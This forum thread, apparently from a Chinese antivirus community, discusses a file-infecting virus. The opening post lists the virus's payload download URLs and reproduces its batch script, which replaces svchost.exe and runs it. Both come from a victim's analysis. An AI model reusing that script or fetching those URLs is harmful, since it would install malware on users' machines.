瑞星卡卡安全论坛

今天装软件遇到的问题，相信在不久会有很多的人来问这个问题。
很多exe文件都不能用了，都中毒了
却发现运行不了。。。估计有问题，所以用OD快速跑了一遍，原来是被感染了
发现所有的EXE也都被感染了，跟上次中的威金一样，上次损失惨重，这次又有得哭了
问题补充：可以确定病毒的动作是下载http://gm3.testkl.cn/kl.exe到C:\Program Files\Common Files\System\svchost.exe并执行！那怎么修复被感染的文件呢？
====================================================================================================================
1：临时文件夹发现
http://gm3.tesk1.cn/1.exe
http://gm3.tesk1.cn/2.exe
http://gm3.tesk1.cn/3.exe
2：C:\Program Files\Common Files\System目录下发现：
D1.EXE
D2.EXE
D3.EXE
3：发现一个updskl.BAT文件，居然出现在F盘下
@echo off
:loop
del "C:\Program Files\Common Files\System\svchost.exe"
del "C:\Program Files\Common Files\System\ver.txt"
del "C:\Program Files\Common Files\System\she.dll"
if exist "C:\Program Files\Common Files\System\svchost.exe" goto loop
C:
cd C:\Program Files\Common Files\System\
ren svchostnew.exe svchost.exe
call "C:\Program Files\Common Files\System\svchost.exe"
del "C:\Program Files\Common Files\System\updskl.bat"
这种病毒可感染exe,rar,一旦运行被感染的exe文件就会增加2个C:\Program Files\Common Files\System\svchost.exe进程,而且360不能查到这个进程,并且也会被感染,冰刃可以查到这个进程,但同样被感染,求修复的方法.....
问题补充,现在发现rar文件同样被感染


附件: 8790212007525181919.bmp

艾尼么?

C:\Program Files\Common Files\System\svchost.exe

发到Lyhan_1988@163.com

加密virus

被感染的exe发给我几个 C:\Program Files\Common Files\System\svchost.exe还有这个
newcenturymoon1986@yahoo.com.cn 加密123
给你发悄悄话了 也可以加我的qq

也给我一份，谢谢~~
zhangqi802@163.com

引用:

【心随我冻的贴子】今天装软件遇到的问题，相信在不久会有很多的人来问这个问题。 很多exe文件都不能用了，都中毒了 却发现运行不了。。。估计有问题，所以用OD快速跑了一遍，原来是被感染了 发现所有的EXE也都被感染了，跟上次中的威金一样，上次损失惨重，这次又有得哭了 问题补充：可以确定病毒的动作是下载http://gm3.testkl.cn/kl.exe到C:\Program Files\Common Files\System\svchost.exe并执行！那怎么修复被感染的文件呢？ ==================================================================================================================== 1：临时文件夹发现 http://gm3.tesk1.cn/1.exe http://gm3.tesk1.cn/2.exe http://gm3.tesk1.cn/3.exe 2：C:\Program Files\Common Files\System目录下发现： D1.EXE D2.EXE D3.EXE 3：发现一个updskl.BAT文件，居然出现在F盘下 @echo off :loop del "C:\Program Files\Common Files\System\svchost.exe" del "C:\Program Files\Common Files\System\ver.txt" del "C:\Program Files\Common Files\System\she.dll" if exist "C:\Program Files\Common Files\System\svchost.exe" goto loop C: cd C:\Program Files\Common Files\System\ ren svchostnew.exe svchost.exe call "C:\Program Files\Common Files\System\svchost.exe" del "C:\Program Files\Common Files\System\updskl.bat" 这种病毒可感染exe,rar,一旦运行被感染的exe文件就会增加2个C:\Program Files\Common Files\System\svchost.exe进程,而且360不能查到这个进程,并且也会被感染,冰刃可以查到这个进程,但同样被感染,求修复的方法..... ………………

关闭瑞星监控，这个kl.exe在我这里也没法完整运行。只是在c:\Program Files\Common Files\System\文件夹释放了一个she.dll，就开始调用ddwin.exe调试了。调试半天，死翘翘了
把那个she.dll删除了。完事。

附件: 1558472007525171458.jpg

估计楼主选了忽略，还打了勾~

楼上的几位大哥，帮帮忙吧，我重新GHOST了系统，现在不敢打开D、E、F，一打开就关我的瑞星和卡卡防漏，打开网页自动关闭，我扫描日志的文件在F盘里，现在不敢打开F盘，请发个下载扫描日志的地址，我扫一下日志，帮帮忙吧！急！！！急！！！加急！！！的

F盘通过上面的地址栏打开

这还涉及隐藏文件呢。

建议在再GHOST新系统后，不要打开任何磁盘，直接用WinRAR打开所有磁盘，看根目录下有不明的文件，压缩备份并删除。

试试。